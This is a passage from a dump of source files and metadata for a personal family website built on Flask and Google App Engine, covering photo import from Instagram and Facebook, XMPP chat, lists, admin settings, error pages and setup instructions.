"content_id": "eaa106457153c0aed59ae65fc5e2ce22c4fb2f72",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1485,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 40,
"path": "/family/models/photo.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import datetime\n\nfrom google.appengine.ext import ndb\n\n\nclass Photo(ndb.Model):\n link = ndb.StringProperty()\n created_time = ndb.DateTimeProperty()\n thumbnail = ndb.StringProperty()\n source = ndb.StringProperty()\n likes_count = ndb.IntegerProperty()\n comments_count = ndb.IntegerProperty()\n caption = ndb.StringProperty()\n user_name = ndb.StringProperty()\n\n @classmethod\n def from_instagram_photo(cls, photo):\n return cls(\n link=photo['link'],\n created_time=datetime.datetime.fromtimestamp(int(photo['created_time'])),\n thumbnail=photo['images']['thumbnail']['url'],\n source=photo['images']['standard_resolution']['url'],\n likes_count=photo['likes']['count'],\n comments_count=photo['comments']['count'],\n caption=photo['caption']['text'] if photo['caption'] else None,\n user_name=photo['user']['full_name'],\n )\n\n @classmethod\n def from_facebook_photo(cls, photo):\n return cls(\n link=photo['link'],\n created_time=datetime.datetime.strptime(photo['created_time'], \"%Y-%m-%dT%H:%M:%S+0000\"),\n thumbnail=photo['picture'],\n source=photo['source'],\n likes_count=len(photo.get('likes', {'data': []})['data']),\n comments_count=len(photo.get('comments', {'data': []})['data']),\n caption=getattr(photo, 'name', None),\n user_name=photo['from']['name'],\n )\n"
},
{
"alpha_fraction": 0.6106870174407959,
"alphanum_fraction": 0.6106870174407959,
"avg_line_length": 22.81818199157715,
"blob_id": "4e2d5da1605b4704db2bfb6f8696a16815670d1b",
"content_id": "a62a3f1ca1da0ddb7cabb9deaf4340127f197a5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 262,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 11,
"path": "/family/config.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import os\n\n\ndef setup_config(app):\n config = app.config\n\n config['SECRET_KEY'] = app.settings.get('secret.key')\n if 'localhost' in os.environ.get('SERVER_NAME', ''):\n config['DEBUG'] = True\n else:\n config['TRAP_HTTP_EXCEPTIONS'] = True\n"
},
{
"alpha_fraction": 0.4603658616542816,
"alphanum_fraction": 0.4672256112098694,
"avg_line_length": 38.75757598876953,
"blob_id": "ed568a4009ab55cb2d00d30afea9bcfdb6bb6daf",
"content_id": "7ddb1d36cb4b711f8735cded787fa2ec3c372049",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1313,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 33,
"path": "/family/templates/home.html",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "{% extends 'layout.html' %}\n\n{% block body %}\n {% if not settings_initialized %}\n <div class=\"alert alert-warning\">\n Your site has not been set up yet. <a href=\"{{ url_for('setup_wizard') }}\">Set it up now.</a>\n </div>\n {% endif %}\n <div class=\"jumbotron jumbotron-home\">\n <h1>\n Hello, family!\n </h1>\n <p>\n This is the {{ settings.get('site.name') }}. We hope you find it useful and informative.\n </p>\n {% if birthday_reminders %}\n {% for reminder in birthday_reminders %}\n {% if reminder[1] == 0 %}\n <div class=\"alert alert-success\">\n Today is {{ reminder[0] }}'s birthday! Try to wish this person a Happy Birthday today if you get a chance...\n </div>\n {% else %}\n <div class=\"alert alert-info\">\n {{ reminder[0] }}'s birthday is coming up in {{ reminder[1] }} day{% if reminder[1] > 1 %}s{% endif %}.\n </div>\n {% endif %}\n {% endfor %}\n {% endif %}\n <p>\n <a class=\"btn btn-primary btn-large btn-padding\" href=\"{{ url_for('messages') }}\">View message board »</a>\n </p>\n </div>\n{% endblock body %}\n"
},
{
"alpha_fraction": 0.6804872155189514,
"alphanum_fraction": 0.6898571252822876,
"avg_line_length": 31.09774398803711,
"blob_id": "6148294c0da3b9b0d1f053f18da1c8b79c9a61de",
"content_id": "67536ca4faebc57a4280cdc5dfa3ca2880471084",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4269,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 133,
"path": "/family/views/chat.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import datetime\n\nfrom google.appengine.api import xmpp\nfrom google.appengine.ext import ndb\nfrom werkzeug.exceptions import NotFound\nfrom flask import request, render_template, jsonify, g\nfrom family.decorators import requires_login\nfrom family.models.chat import ChatSubscriber, ChatMessage\nfrom family import app\n\n\n\"\"\"\nTODO:\nConsider sending a (self) presence message to all chat subscribers when the app starts up, and\non a shutdown hook, send a presence of unavailable\n\"\"\"\n\n\[email protected]('/_ah/xmpp/presence/available/', methods=['POST'])\ndef xmpp_subscriber_available():\n \"\"\" Called when a user comes online\n \"\"\"\n from_address = request.form.get('from')\n key = ndb.Key(ChatSubscriber, from_address)\n subscriber = key.get()\n if subscriber:\n subscriber.is_online = True\n subscriber.put()\n return '', 200\n return NotFound()\n\n\[email protected]('/_ah/xmpp/presence/unavailable/', methods=['POST'])\ndef xmpp_subscriber_unavailable():\n \"\"\" Called when a user goes offline\n \"\"\"\n from_address = request.form.get('from')\n key = ndb.Key(ChatSubscriber, from_address)\n subscriber = key.get()\n if subscriber:\n subscriber.is_online = False\n subscriber.put()\n return '', 200\n return NotFound()\n\n\[email protected]('/_ah/xmpp/presence/probe/', methods=['POST'])\ndef xmpp_subscriber_probe():\n \"\"\" Called when someone requests to see if the main website chat user is online\n \"\"\"\n return '', 200\n\n\n# 1) Member visits the chat page\[email protected]('/chat', methods=['GET'])\n@requires_login\ndef chat():\n # 1a) Request online status of each subscriber\n for subscriber in ChatSubscriber.query():\n xmpp.send_presence(subscriber, presence_type=xmpp.PRESENCE_TYPE_PROBE)\n return render_template('chat.html')\n\n\n# 2) Asynchronously request all chat messages\[email protected]('/chat/messages', methods=['GET'])\n@requires_login\ndef chat_messages():\n cutoff = datetime.datetime.now() - datetime.timedelta(weeks=4)\n results = ChatMessage.query(ChatMessage.posted_date > cutoff).order(ChatMessage.posted_date)\n messages = [{'sender': m.sender, 'body': m.body, 'date': m.humanized_posted_date} for m in results]\n return jsonify({'messages': messages})\n\n\n# 3) Asynchronously request all subscribers (including their online status)\[email protected]('/chat/subscribers', methods=['GET'])\n@requires_login\ndef chat_subscribers():\n subscribers = [{'name': s.key.id(), 'status': 'online' if s.is_online else 'offline'}\n for s in ChatSubscriber.query()]\n return jsonify({'subscribers': subscribers})\n\n\n# 4) Member clicks a link to send a chat invitation out to himself\[email protected]('/chat/invite', methods=['GET'])\n@requires_login\ndef send_invite():\n # 4a) The chat service sends an invite to the XMPP user\n xmpp.send_invite(request.args['to'])\n return '', 200\n\n\n# 5) A site member posts a message to the chat server\[email protected]('/_ah/xmpp/subscription/subscribed/', methods=['POST'])\ndef xmpp_subscribed():\n # 5a) We add him to the list of chat subscribers\n jid = request.form['from'].split('/')[0]\n ChatSubscriber.add_subscriber(jid)\n return '', 200\n\n\n# 6) This is called when the user accepts the invite using his XMPP (Gtalk) chat client\[email protected]('/chat/send', methods=['POST'])\n@requires_login\ndef chat_send():\n # 5a) We only send the message to the main site XMPP user\n from_jid = '%[email protected]' % g.member.first_name\n message = request.json['message']\n if message:\n xmpp.send_message('[email protected]', message, 
from_jid=from_jid)\n return '', 200\n\n\n# 7) This is called when the message is received by the site XMPP user\[email protected]('/_ah/xmpp/message/chat/', methods=['POST'])\ndef xmpp_receive_message():\n message = xmpp.Message(request.form)\n\n # 6a) Write the message to the database\n ChatMessage.save_message(message.sender, message.body)\n\n # 6b) Broadcast the message to all chat subscribers\n for subscriber in ChatSubscriber.query():\n xmpp.send_message(subscriber.key.id(), message)\n return '', 200\n\n\n# 8) The user decides to unsubscribe from the chat\[email protected]('/chat/remove', methods=['POST'])\n@requires_login\ndef chat_remove():\n jid = request.form['subscriber']\n ChatSubscriber.remove_subscriber(jid)\n return '', 200\n"
},
{
"alpha_fraction": 0.7379454970359802,
"alphanum_fraction": 0.75262051820755,
"avg_line_length": 29.774192810058594,
"blob_id": "8f0ad4484c61845ac6214d72caa9705cacb8fd32",
"content_id": "a0fa37453689db87ac166eb73ad0a0974e99023c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1908,
"license_type": "no_license",
"max_line_length": 286,
"num_lines": 62,
"path": "/README.md",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "# My family website\n\nThis is probably not interesting to anyone other than me\n\nThe technologies in use are:\n\n* Python\n* Flask\n* Google App Engine\n\n## Set up instructions\n\n*Note: As with most development projects, it'll be easier to run this on either Linux or a Mac. If you have Windows, I recommend running Ubuntu inside a virtual machine.*\n\n1. Install Python 2.7 and pip\n\t* I highly recommend installing virtualenv and virtualenvwrapper too\n\t\n2. Install Google App Engine SDK\n\t* https://developers.google.com/appengine/downloads\n\t\n3. Go to your top-level projects folder (where you want this to live) and type:\n```\ngit clone https://github.com/trungly/thelyfamily.git\ncd thelyfamily\n```\t\n\n3.5. In MacOS 10.9.1, you would need to edit the bashrc file to include the correct path to virtualenvwrapper in order to go to step 4. Add the following to your bashrc file (mine's located in /etc/). Please change the location of virtualenvwrapper to the location on your computer. \n\nnano ~/.bashrc\nexport WORKON_HOME=$HOME/.virtualenvs\nsource /Library/Frameworks/Python.framework/Versions/2.7/bin/virtualenvwrapper$\n\nAfter appending to bashrc, reload with:\nsource ~/.bashrc\n\n4. Create your virtual environment here\n```\nmkvirtualenv thelyfamily\n```\n\n5. Install the Python package called PIL (Python Image Library). On Mac, it is called pillow, so the command would be:\n```\npip install pillow\n```\t\n\t*Note: PIL is only needed locally for manipulating images; Google App Engine takes care of this for us on the production server.*\n\t\n6. Install the rest of the python packages from requirements.txt into the server/lib directory by doing this:\n```\npip install -r requirements.txt -t server/lib\n```\t\n\n7. Run the server\n```\ndev_appserver.py .\n```\t\n\n8. In your web browser, go to:\n```\nlocalhost:8080\n```\t\n\n9. You can go to `http://localhost:8000` if you want to mess with things like viewing the Datastore (database)\n"
},
{
"alpha_fraction": 0.441433310508728,
"alphanum_fraction": 0.44384220242500305,
"avg_line_length": 33.59375,
"blob_id": "1d6c4c5c06c01a08d86ac51377181366065a9de8",
"content_id": "639fbff0a6b3ce855bfc5c7cc660be34cc59a676",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3321,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 96,
"path": "/static/js/lists.js",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "angular.module('underscore', []).factory('_', function() {\n return window._;\n});\n\nangular.module('ListsApp', ['underscore', 'ui.sortable', 'ngResource'])\n .factory('Lists', function($resource) {\n return $resource('/api/lists/:id', {}, {'query': {method: 'GET', isArray: false }});\n })\n .controller('ListCtrl', ['$scope', 'Lists', '_', function($scope, Lists, _) {\n/*\n $scope.lists = [\n {\n id: 1,\n name: 'Todo'\n },\n {\n id: 2,\n name: 'Shopping',\n items: [\n 'eggs',\n 'bacon'\n ]\n }\n ];\n*/\n //$scope.lists = Lists.query();\n Lists.query(function (resource) {\n $scope.lists = resource.data;\n });\n\n $scope.activeListId = null;\n $scope.setActiveList = function(id) {\n if (id !== $scope.activeListId) {\n $scope.activeListId = id;\n $scope.newItem = '';\n $scope.$broadcast('newListSelected');\n }\n };\n $scope.activeList = function() {\n if (!$scope.activeListId) { return {}; }\n var result = $scope.lists.filter(function(element) {\n return element.id === $scope.activeListId;\n });\n return result.length ? result[0] : {};\n };\n $scope.sortableOptions = {\n additionalPlaceholderClass: 'dragged-item'\n };\n\n $scope.addItemOnEnter = function(event) {\n if (event.keyCode === 13) {\n var newItem = event.currentTarget.value;\n if (newItem) {\n var items = $scope.activeList().items;\n if (items) {\n items.push(newItem);\n } else {\n $scope.activeList().items = [newItem];\n }\n }\n // clear out the preview line\n this.newItem = ''; // 'this' is the current child scope\n }\n };\n $scope.ctrlClickDeleteItem = function(event) {\n if (event.ctrlKey || event.metaKey) {\n $scope.activeList().items = _.without($scope.activeList().items, this.item);\n }\n };\n\n $scope.createNewList = function() {\n var latestList = _.max($scope.lists, function(list){ return list.id; });\n $scope.lists.push({\n id: latestList.id + 1,\n name: 'New List'\n });\n $scope.setActiveList(latestList.id + 1);\n };\n $scope.deleteActiveList = function() {\n $scope.lists = _.reject($scope.lists, function(list){ return list.id === $scope.activeListId; });\n $scope.activeListId = 0;\n }\n }])\n .directive('focusOn', function($timeout) {\n return {\n restrict: 'A',\n link: function(scope, element, attrs) {\n scope.$on(attrs['focusOn'], function() {\n $timeout(function() { // wait till DOM renders the element\n element.focus();\n scope.newItem = ''; // clear the newItem model too\n })\n });\n }\n }\n });\n"
},
{
"alpha_fraction": 0.7202970385551453,
"alphanum_fraction": 0.7227723002433777,
"avg_line_length": 22.764705657958984,
"blob_id": "5351eb3860baa6b7910e7912632d0508a5001164",
"content_id": "4feff7e0352c768ecfb48a930067de6a023dd54c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 404,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 17,
"path": "/family/models/list.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from markdown2 import markdown\nfrom google.appengine.ext import ndb\nfrom family.models.member import Member\nfrom family.utils import pretty_date\n\n\nclass Item(ndb.Model):\n \"\"\" Represents an item on a list \"\"\"\n\n name = ndb.TextProperty()\n\n\nclass List(ndb.Model):\n \"\"\" Represents a list that contains items \"\"\"\n\n name = ndb.TextProperty()\n items = ndb.StructuredProperty(Item, repeated=True)\n"
},
{
"alpha_fraction": 0.6865671873092651,
"alphanum_fraction": 0.7574626803398132,
"avg_line_length": 32.5,
"blob_id": "c2340f490e69ca19f97eb6c3e880ff69fa7164e2",
"content_id": "01e2a147cba092b19020104c205c24ff723761c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 268,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 8,
"path": "/requirements.txt",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "# This requirements file lists all dependencies for this project.\n# Run 'pip install -r requirements.txt -t server/lib' to install these dependencies\n# in this project's server/lib directory.\nFlask==1.0\nFlask-WTF==0.10.3\nrequests==2.20.0\nmarkdown2==2.3.8\npytz==2016.4\n"
},
{
"alpha_fraction": 0.6945876479148865,
"alphanum_fraction": 0.7139175534248352,
"avg_line_length": 30.040000915527344,
"blob_id": "67e815ee8716164e1d4a201b01b313509bab6c0f",
"content_id": "8f3e525b63eb980139234838087c31cb28b4c879",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 776,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 25,
"path": "/family/views/error.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import sys\nimport traceback\n\nfrom flask import render_template\nfrom family import app\n\n\nERROR_MESSAGES = {\n 403: 'Tsk Tsk. You shouldn\\'t be here.',\n 404: 'Huh? That page doesn\\'t even exist.',\n 500: 'Dang. Something broke.'\n}\n\n\ndef catchall_error_handler(error):\n error.code = getattr(error, 'code', 500) # default uncaught errors to HTTP 500 error\n error.description = getattr(error, 'description', 'An uncaught error has occurred.')\n error.message = ERROR_MESSAGES.get(error.code, 'Congrats! You found an unknown error.')\n error.stacktrace = traceback.format_exception(*sys.exc_info())\n\n return render_template('error.html', error=error), error.code\n\n\nfor code in ERROR_MESSAGES.keys():\n app.register_error_handler(code, catchall_error_handler)\n"
},
{
"alpha_fraction": 0.620192289352417,
"alphanum_fraction": 0.621082603931427,
"avg_line_length": 35.70588302612305,
"blob_id": "02a7cd04d14af9c7bb82ae29b9b903a9a6309047",
"content_id": "097356a1c36e81e2f8943da38a1c03797db42386",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5616,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 153,
"path": "/family/views/photos.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import cgi\nimport datetime\nimport requests\n\nfrom google.appengine.ext import blobstore\nfrom flask import current_app, request, g, redirect, url_for, flash, render_template\nfrom family import app\nfrom family.decorators import requires_login\nfrom family.facebook import Facebook\nfrom family.models.photo import Photo\nfrom family.models.instagram import InstagramUser\nfrom family.models.facebook import FacebookUser\n\n\[email protected]('/profile/photo', methods=['POST'])\n@requires_login\ndef profile_photo():\n _, params = cgi.parse_header(request.files['profile_photo'].headers['Content-Type'])\n profile = g.member.profile\n profile.photo_key = blobstore.BlobKey(params['blob-key'])\n profile.put()\n return redirect(url_for('profile'))\n\n\[email protected]('/profile/photo/delete', methods=['POST'])\n@requires_login\ndef profile_photo_delete():\n profile = g.member.profile\n photo_key = profile.photo_key\n blobstore.delete(photo_key)\n profile.photo_key = None\n profile.put()\n return '', 200\n\n\[email protected]('/photos')\n@requires_login\ndef photos():\n all_photos = []\n for user in (InstagramUser.query().fetch()):\n response = requests.get(user.recent_photos_url)\n if response.ok:\n current_user_photos = response.json().get('data', None)\n current_user_photos = [Photo.from_instagram_photo(p) for p in current_user_photos]\n if current_user_photos:\n all_photos = all_photos + current_user_photos\n\n for user in (FacebookUser.query().fetch()):\n response = requests.get(user.recent_photos_url)\n if response.ok:\n current_user_photos = response.json().get('data', None)\n current_user_photos = [Photo.from_facebook_photo(p) for p in current_user_photos]\n if current_user_photos:\n all_photos = all_photos + current_user_photos\n\n return render_template('photos.html', photos=sorted(all_photos, key=lambda x: x.created_time, reverse=True))\n\n\[email protected]('/photos/return')\ndef instagram_return():\n \"\"\" handle return from Instagram Authentication\n \"\"\"\n client_id = current_app.settings.get('instagram.client.id')\n client_secret = current_app.settings.get('instagram.client.secret')\n\n code = request.args.get('code', None)\n error = request.args.get('error', None)\n\n if error:\n flash('There was a problem with Instagram authentication.', 'danger')\n else:\n # This is case we are coming back from a successful Instagram Auth call\n url = 'https://api.instagram.com/oauth/access_token'\n payload = {\n 'client_id': client_id,\n 'client_secret': client_secret,\n 'grant_type': 'authorization_code',\n 'redirect_uri': 'http://%s/photos/return' % current_app.settings.get('host.name'),\n 'code': code,\n }\n response = requests.post(url, data=payload)\n result = response.json()\n user = result.get('user', None)\n\n if user:\n instagram_user = g.member.instagram_user\n instagram_user.populate(\n userid=user['id'],\n access_token=result['access_token'],\n username=user['username'],\n full_name=user['full_name'],\n profile_picture=user['profile_picture'],\n website=user['website'],\n bio=user['bio'],\n )\n instagram_user.put()\n else:\n flash('There was a problem with Instagram authentication. 
No user object found.', 'danger')\n\n return redirect(url_for('photos'))\n\n\[email protected]('/instagram/disconnect')\ndef instagram_disconnect():\n if g.member.instagram_user_key:\n g.member.instagram_user_key.delete()\n g.member.instagram_user_key = None\n g.member.put()\n flash('Successfully disconnected your Instagram account', 'success')\n return redirect(url_for('profile', _anchor=\"connect-accounts\"))\n\n\[email protected]('/facebook/disconnect')\ndef facebook_disconnect():\n if g.member.facebook_user_key:\n g.member.facebook_user_key.delete()\n g.member.facebook_user_key = None\n g.member.put()\n flash('Successfully disconnected your Facebook account', 'success')\n return redirect(url_for('profile', _anchor=\"connect-accounts\"))\n\n\[email protected]('/facebook/return')\ndef facebook_return():\n code = request.args.get('code', None)\n if code:\n url = Facebook.access_token_url(code)\n response = requests.get(url)\n if response.ok:\n access_token = response.content.split('&')[0].split('=')[1]\n url = Facebook.debug_token_url(access_token)\n\n response = requests.get(url)\n if response.ok:\n data = response.json()['data']\n facebook_user = g.member.facebook_user\n facebook_user.populate(\n userid=data['user_id'],\n access_token=access_token,\n expires_at=datetime.datetime.fromtimestamp(data['expires_at']),\n scopes=data['scopes'],\n )\n facebook_user.put()\n else:\n flash('There was a problem with verifying access_token: ' + response.json()['error']['message'],\n 'danger')\n else:\n flash('There was a problem with retrieving access_token: ' + response.content, 'danger')\n else:\n flash('There was a problem with Facebook authentication: No code.', 'danger')\n\n flash('Successfully connected your account!', 'success')\n return redirect('%s#connect-accounts' % url_for('profile'))\n"
},
{
"alpha_fraction": 0.5645719766616821,
"alphanum_fraction": 0.5893121957778931,
"avg_line_length": 30.092308044433594,
"blob_id": "b9f4ab172149197536012c2859dfa9550045d768",
"content_id": "ba940ae770e7a2d351d9077c8f36d7005931c074",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2021,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 65,
"path": "/family/utils.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from flask.json import JSONEncoder\nfrom datetime import datetime, date, time\nfrom google.appengine.ext import ndb\n\n\n# From: http://stackoverflow.com/questions/1551382/user-friendly-time-format-in-python\n# TODO: convert to a Jinja2 filter\n\n\ndef pretty_date(time=False):\n \"\"\"\n Get a datetime object or a int() Epoch timestamp and return a\n pretty string like 'an hour ago', 'Yesterday', '3 months ago',\n 'just now', etc\n \"\"\"\n from datetime import datetime\n now = datetime.now()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time,datetime):\n diff = now - time\n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"just now\"\n if second_diff < 60:\n return str(second_diff) + \" seconds ago\"\n if second_diff < 120:\n return \"a minute ago\"\n if second_diff < 3600:\n return str( second_diff / 60 ) + \" minutes ago\"\n if second_diff < 7200:\n return \"an hour ago\"\n if second_diff < 86400:\n return str( second_diff / 3600 ) + \" hours ago\"\n if day_diff == 1:\n return \"Yesterday\"\n if day_diff < 7:\n return str(day_diff) + \" days ago\"\n if day_diff < 31:\n return str(day_diff/7) + \" weeks ago\"\n if day_diff < 365:\n return str(day_diff/30) + \" months ago\"\n return str(day_diff/365) + \" years ago\"\n\n\nclass NDBModelJSONEncoder(JSONEncoder):\n\n def default(self, obj):\n if isinstance(obj, ndb.Key):\n return obj.id()\n elif isinstance(obj, ndb.Model):\n # call model's to_dict() and tack on the id as well\n return dict(obj.to_dict(), **dict(id=obj.key.id()))\n elif isinstance(obj, (datetime, date, time)):\n return str(obj) # todo: make sure this is what we want\n\n return JSONEncoder.default(self, obj)\n"
},
{
"alpha_fraction": 0.6231883764266968,
"alphanum_fraction": 0.6231883764266968,
"avg_line_length": 28.571428298950195,
"blob_id": "8de256fcf59d94e1c4a0cf196c037e861262ad20",
"content_id": "8df66111808f9aac7d310d1df2f3badcdc000d7b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 414,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 14,
"path": "/family/decorators.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from functools import wraps\nfrom flask import g, flash, redirect, url_for\n\n\ndef requires_login(func):\n @wraps(func)\n def decorator(*args, **kwargs):\n if hasattr(g, 'member') and g.member:\n return func(*args, **kwargs)\n else:\n flash('You will need to log in before you can access this website', 'warning')\n return redirect(url_for('home'))\n\n return decorator\n"
},
{
"alpha_fraction": 0.6473922729492188,
"alphanum_fraction": 0.6473922729492188,
"avg_line_length": 31.66666603088379,
"blob_id": "3c8d8e37e91c13872972bacef8a82db5ebb1175f",
"content_id": "ec08aa2638e250a64faea5404f6f5677b70181d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 882,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 27,
"path": "/family/models/wishlist.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from google.appengine.ext import ndb\n\n\nclass WishlistItem(ndb.Model):\n \"\"\" Represents an item on a user's wish list \"\"\"\n\n name = ndb.StringProperty(required=True)\n link = ndb.StringProperty()\n details = ndb.StringProperty()\n is_giver_anonymous = ndb.BooleanProperty(default=True)\n status = ndb.StringProperty(required=True, default='open')\n created_date = ndb.DateTimeProperty()\n\n owner_key = ndb.KeyProperty(kind='Member')\n giver_key = ndb.KeyProperty(kind='Member')\n\n @property\n def giver(self):\n return self.giver_key.get() if self.giver_key else None\n\n def update_status(self, status, member_key):\n self.status = status\n if status == 'open':\n self.giver_key = None # clear it out if it's open\n elif status == 'reserved' or status == 'locked':\n self.giver_key = member_key\n self.put()\n"
},
{
"alpha_fraction": 0.7112188339233398,
"alphanum_fraction": 0.7153739333152771,
"avg_line_length": 27.3137264251709,
"blob_id": "6b7be5d23d5db22b266862e0c7f8a9b7ae6a43fd",
"content_id": "1395b3687ec92972f8119d2c00d8ad2fbe45f8b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1444,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 51,
"path": "/family/views/admin.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import yaml\n\nfrom flask import render_template, jsonify, request, make_response\nfrom family import app\nfrom family.decorators import requires_login\nfrom family.models.member import Member\n\n\[email protected]('/admin', methods=['GET'])\n@requires_login\ndef admin():\n return render_template('admin.html')\n\n\[email protected]('/admin/settings', methods=['GET'])\n@requires_login\ndef all_settings():\n return jsonify({'settings': app.settings.get_all(as_name_value_list=True)})\n\n\[email protected]('/admin/settings/update', methods=['POST'])\n@requires_login\ndef update_settings():\n app.settings.set_all(request.json['settings'])\n return '', 200\n\n\[email protected]('/admin/settings/reset', methods=['GET'])\n@requires_login\ndef reset_settings():\n app.settings.set('settings.initialized', False)\n from family.settings import SiteSettings\n app.settings = SiteSettings(app)\n return '', 200\n\n\[email protected]('/admin/members', methods=['GET'])\n@requires_login\ndef all_members():\n members = Member.query().fetch()\n serialized_members = [m.to_dict(exclude=['profile_key']) for m in members]\n return jsonify({'members': serialized_members})\n\n\[email protected]('/admin/settings/export', methods=['GET'])\n@requires_login\ndef admin_export_settings():\n settings = app.settings.as_yaml()\n response = make_response(yaml.dump(settings, default_flow_style=False))\n response.headers[\"Content-Disposition\"] = \"attachment; filename=settings.yaml\"\n return response\n"
},
{
"alpha_fraction": 0.6544342637062073,
"alphanum_fraction": 0.6544342637062073,
"avg_line_length": 44.41666793823242,
"blob_id": "8dc53bfd9f129eee908798dbde95c128a48c3bd1",
"content_id": "775d8e534a97a7f1a4324b95a264cad01ec9577d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1635,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 36,
"path": "/family/facebook.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from flask import current_app\n\n\nclass Facebook(object):\n\n @staticmethod\n def access_token_url(code):\n url = 'https://graph.facebook.com/oauth/access_token?client_id={app_id}&redirect_uri={redirect_uri}&client_secret={app_secret}&code={code}'.format(\n app_id=current_app.settings.get('facebook.app.id'),\n redirect_uri='http://%s/facebook/return' % current_app.settings.get('host.name'),\n app_secret=current_app.settings.get('facebook.app.secret'),\n code=code\n )\n return url\n\n @staticmethod\n def debug_token_url(access_token):\n \"\"\" Facebook's auth API's are really confusing. This one is called 'Inspect access tokens' in the docs:\n https://developers.facebook.com/docs/facebook-login/manually-build-a-login-flow/#confirm\n In this one, input_token is the token you're inspecting (which was the user's access_token previously).\n And here, access_token is the site's access token.\n We're mainly using it to get to the user's userid in order to store in the database\n \"\"\"\n url = 'https://graph.facebook.com/debug_token?input_token={input_token}&access_token={access_token}'.format(\n input_token=access_token,\n access_token=current_app.settings.get('facebook.access.token')\n )\n return url\n\n @staticmethod\n def uploaded_photos_url(facebook_user):\n url = 'https://graph.facebook.com/{userid}/photos/uploaded?access_token={access_token}'.format(\n userid=facebook_user.userid,\n access_token=facebook_user.access_token,\n )\n return url\n"
},
{
"alpha_fraction": 0.7369668483734131,
"alphanum_fraction": 0.7393364906311035,
"avg_line_length": 31.461538314819336,
"blob_id": "704ffdab1e624fb34603676e8c65bfed8377ea0c",
"content_id": "b719eaf40aabbca1278e613d1bb2d96e6795ac96",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 422,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 13,
"path": "/appengine_config.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\n\n# required to load libraries under server/lib that Flask depends on\napp_root_dir = os.path.dirname(__file__)\nserver_lib_dir = os.path.join(app_root_dir, 'server/lib')\nif server_lib_dir not in sys.path:\n sys.path.insert(0, server_lib_dir)\n\n# def webapp_add_wsgi_middleware(app):\n# from google.appengine.ext.appstats import recording\n# app = recording.appstats_wsgi_middleware(app)\n# return app\n"
},
{
"alpha_fraction": 0.6885592937469482,
"alphanum_fraction": 0.6885592937469482,
"avg_line_length": 30.46666717529297,
"blob_id": "fb14c5537594d4ba56a6b40b454f6a50f81d17e6",
"content_id": "b7fb9ac10c50a41ad029bc34e75cbbc32d6364bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 944,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 30,
"path": "/family/models/chat.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
